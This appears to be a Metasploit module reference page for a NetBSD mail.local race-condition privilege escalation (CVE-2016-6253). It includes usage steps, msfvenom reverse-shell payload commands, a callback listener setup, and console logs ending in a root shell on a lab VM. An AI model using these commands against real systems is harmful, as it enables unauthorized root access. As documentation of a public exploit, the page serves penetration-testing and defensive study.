NetBSD mail.local Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/unix/local/netbsd_mail_local metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: NetBSD mail.local Privilege Escalation
Module: exploit/unix/local/netbsd_mail_local
Source code: modules/exploits/unix/local/netbsd_mail_local.rb
Disclosure date: 2016-07-07
Last modification time: 2021-01-21 19:59:29 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2016-6253
This module attempts to exploit a race condition in mail.local with SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 - 6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/unix/local/netbsd_mail_local
msf exploit(netbsd_mail_local) > show targets
... a list of targets ...
msf exploit(netbsd_mail_local) > set TARGET target-id
msf exploit(netbsd_mail_local) > show options
... show and set options ...
msf exploit(netbsd_mail_local) > set SESSION session-id
msf exploit(netbsd_mail_local) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
NetBSD 7.0.1 is available from the official site, or on an unofficial git
Issues
Getting an initial shell that can write files correctly was difficult. The best I found was reverse_openssl.
Payloads that didn't work:
* cmd/unix/reverse - connected back, but couldn't write file.
[*] Started reverse TCP double handler on 172.16.152.1:4444
[*] Writing Payload to /tmp/zrWqhXpL
[*] Max line length is 131073
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data
[*] Exploit completed, but no session was created.
* cmd/unix/reverse_awk - awk: syntax error at source line 1
* cmd/unix/reverse_bash - ./bsd.payload: 1: Syntax error: Bad fd number
* cmd/unix/reverse_bash_telnet_ssl - $ telnet: unknown option -- z
* cmd/unix/reverse_ssl_double_telnet - $ telnet: unknown option -- z
* cmd/unix/reverse_lua - lua: (command line):1: module 'socket' not found
* netcat, node, perl, php, python, php, ruby, zsh - all not installed by default
* bsd/* didn't seem to work either, maybe its for freebsd?
Payloads that did work: * cmd/unix/reverse_openssl
Verification Steps
- Start msfconsole
- Get an initial shell
- Create working shell, scp it over
./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload scp /tmp/bsd.payload [email protected]:/tmp/
- Setup msf to handle
use exploit/multi/handler set payload cmd/unix/reverse_openssl set lhost 172.16.152.1 exploit
- Run the shell from NetBSD
$ cd /tmp $ ls bsd.payload $ chmod +x bsd.payload $ ./bsd.payload $ WARNING: can't open config file: /etc/openssl/openssl.cnf depth=0 CN = vgekg verify error:num=18:self signed certificate verify return:1 depth=0 CN = vgekg verify return:1
- Receive the shell and background it
[*] Started reverse double SSL handler on 172.16.152.1:4444 [*] Starting the payload handler... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo NwNHAEiJioYIvn4M; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "NwNHAEiJioYIvn4M\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400 ^Z Background session 1? [y/N] y
- Create working shell, scp it over
- Do:
use exploit/unix/local/netbsd_mail_local
- Do:
set payload cmd/unix/reverse_openssl
- Do:
set lhost 172.16.152.1
- Do:
set verbose true
- Do:
set session 1
- Do:
exploit
- You should get a root shell.
Options
ATRUNPATH
File location of atrun, defaults to /usr/libexec/atrun
MAILDIR
Location of mail folder, defaults to /var/mail
WritableDir
Location of a writable directory for our payload, defaults to /tmp
ListenerTimeout
Since this exploit utilized a cron which has a 10min timer, the listener timeout needs to be 10min + padding. Defaults to 603
seconds (10min, 3sec)
Scenarios
Here is a run against a virgin install of NetBSD 7.0.1 NetBSD 7.0.1 (GENERIC.201605221355Z) amd64
(from the unofficial link at the top)
In this example, I got lucky and only had to wait ~1min for the cron to hit, which is every 10min by default
- Get an initial shell
- Create working shell, scp it over
./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload scp /tmp/bsd.payload [email protected]:/tmp/
- Setup msf to handle
use exploit/multi/handler set payload cmd/unix/reverse_openssl set lhost 172.16.152.1 exploit
- Run the shell from NetBSD
$ cd /tmp $ ls bsd.payload $ chmod +x bsd.payload $ ./bsd.payload $ WARNING: can't open config file: /etc/openssl/openssl.cnf depth=0 CN = vgekg verify error:num=18:self signed certificate verify return:1 depth=0 CN = vgekg verify return:1
- Receive the shell and background it
[*] Started reverse double SSL handler on 172.16.152.1:4444 [*] Starting the payload handler... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo NwNHAEiJioYIvn4M; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "NwNHAEiJioYIvn4M\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400 ^Z Background session 1? [y/N] y
- Create working shell, scp it over
- Run the exploit
msf exploit(netbsd_mail_local) > set payload cmd/unix/reverse_openssl payload => cmd/unix/reverse_openssl msf exploit(netbsd_mail_local) > set lhost 172.16.152.1 lhost => 172.16.152.1 msf exploit(netbsd_mail_local) > set verbose true verbose => true msf exploit(netbsd_mail_local) > set session 1 session => 1 msf exploit(netbsd_mail_local) > exploit [*] Started reverse double SSL handler on 172.16.152.1:4444 [*] Writing Payload to /tmp/pjDkvmGg [*] Max line length is 131073 [*] Writing 176 bytes in 1 chunks of 618 bytes (octal-encoded), using printf [*] Writing exploit to /tmp/GHIKGOWX.c [*] Max line length is 131073 [*] Writing 4898 bytes in 1 chunks of 17162 bytes (octal-encoded), using printf [*] Compiling /tmp/GHIKGOWX.c via gcc [*] Starting the payload handler... [*] Executing at 2016-08-25 19:59:04 -0400. May take up to 10min for callback [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo X6C4UIDx4zmwM0DJ; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "X6C4UIDx4zmwM0DJ\n" [*] Matching... [*] B is input... [*] Command shell session 2 opened (172.16.152.1:4444 -> 172.16.152.128:65532) at 2016-08-25 20:00:02 -0400 [*] 2016-08-25 20:00:02 -0400 [*] Remember to run: chown root:wheel /usr/libexec/atrun [+] Deleted /tmp/pjDkvmGg [!] This exploit may require manual cleanup of '/tmp/pjDkvmGg' on the target [!] This exploit may require manual cleanup of '/tmp/GHIKGOWX' on the target [!] This exploit may require manual cleanup of '/tmp/GHIKGOWX.out' on the target 1633029467 TkBWZEPqsRvYvmwNaTcjImhcSzZHOAtY true JUqfyioWthnpvyxRJAZosSGQjnLHqPUB sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx whoami root
Go back to menu.
Msfconsole Usage
Here is how the unix/local/netbsd_mail_local exploit module looks in the msfconsole:
msf6 > use exploit/unix/local/netbsd_mail_local
msf6 exploit(unix/local/netbsd_mail_local) > show info
Name: NetBSD mail.local Privilege Escalation
Module: exploit/unix/local/netbsd_mail_local
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-07-07
Provided by:
h00die <[email protected]>
akat1
Available targets:
Id Name
-- ----
0 Automatic Target
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ATRUNPATH /usr/libexec/atrun yes Location of atrun binary
ListenerTimeout 603 yes Number of seconds to wait for the exploit
MAILDIR /var/mail yes Location of mailboxes
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files
Payload information:
Description:
This module attempts to exploit a race condition in mail.local with
SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 -
6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab
job with root privilege, which may take up to 10min to execute.
References:
http://akat1.pl/?id=2
https://www.exploit-db.com/exploits/40141
https://nvd.nist.gov/vuln/detail/CVE-2016-6253
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc
Module Options
This is a complete list of options available in the unix/local/netbsd_mail_local exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show options
Module options (exploit/unix/local/netbsd_mail_local):
Name Current Setting Required Description
---- --------------- -------- -----------
ATRUNPATH /usr/libexec/atrun yes Location of atrun binary
ListenerTimeout 603 yes Number of seconds to wait for the exploit
MAILDIR /var/mail yes Location of mailboxes
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files
Exploit target:
Id Name
-- ----
0 Automatic Target
Advanced Options
Here is a complete list of advanced options supported by the unix/local/netbsd_mail_local exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show advanced
Module advanced options (exploit/unix/local/netbsd_mail_local):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 603 no Additional delay in seconds to wait for a session
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/local/netbsd_mail_local module can exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Target
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/local/netbsd_mail_local exploit:
msf6 exploit(unix/local/netbsd_mail_local) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
1 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
Evasion Options
Here is the full list of possible evasion options supported by the unix/local/netbsd_mail_local exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/local/netbsd_mail_local) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Related Pull Requests
- #14640 Merged Pull Request: rubocop -a modules/exploits/unix/local/
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7414 Merged Pull Request: netbsd mail.local bash removal
- #7335 Merged Pull Request: fix my email address
- #7245 Merged Pull Request: Add NetBSD Mail.local privesc module
References
- http://akat1.pl/?id=2
- EDB-40141
- CVE-2016-6253
- http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc
See Also
Check also the following modules related to this module:
- exploit/unix/local/at_persistence
- exploit/unix/local/chkrootkit
- exploit/unix/local/emacs_movemail
- exploit/unix/local/exim_perl_startup
- exploit/unix/local/opensmtpd_oob_read_lpe
- exploit/unix/local/setuid_nmap
- exploit/unix/smtp/morris_sendmail_debug
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/unix/webapp/hastymail_exec
- exploit/unix/webapp/squirrelmail_pgp_plugin
- exploit/unix/webapp/wp_phpmailer_host_header
- exploit/bsd/finger/morris_fingerd_bof
- payload/bsd/sparc/shell_bind_tcp
- payload/bsd/sparc/shell_reverse_tcp
- payload/bsd/vax/shell_reverse_tcp
- payload/bsd/x64/exec
- payload/bsd/x64/shell_bind_ipv6_tcp
- payload/bsd/x64/shell_bind_tcp
- payload/bsd/x64/shell_bind_tcp_small
- payload/bsd/x64/shell_reverse_ipv6_tcp
- payload/bsd/x64/shell_reverse_tcp
- payload/bsd/x64/shell_reverse_tcp_small
- payload/bsd/x86/exec
- payload/bsd/x86/metsvc_bind_tcp
- payload/bsd/x86/metsvc_reverse_tcp
- payload/bsd/x86/shell/bind_ipv6_tcp
- payload/bsd/x86/shell/bind_tcp
- payload/bsd/x86/shell_bind_tcp
- payload/bsd/x86/shell_bind_tcp_ipv6
- payload/bsd/x86/shell_find_port
- payload/bsd/x86/shell/find_tag
- payload/bsd/x86/shell_find_tag
- payload/bsd/x86/shell/reverse_ipv6_tcp
- payload/bsd/x86/shell/reverse_tcp
- payload/bsd/x86/shell_reverse_tcp
- payload/bsd/x86/shell_reverse_tcp_ipv6
- post/bsd/gather/hashdump
Authors
- h00die <[email protected]>
- akat1
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.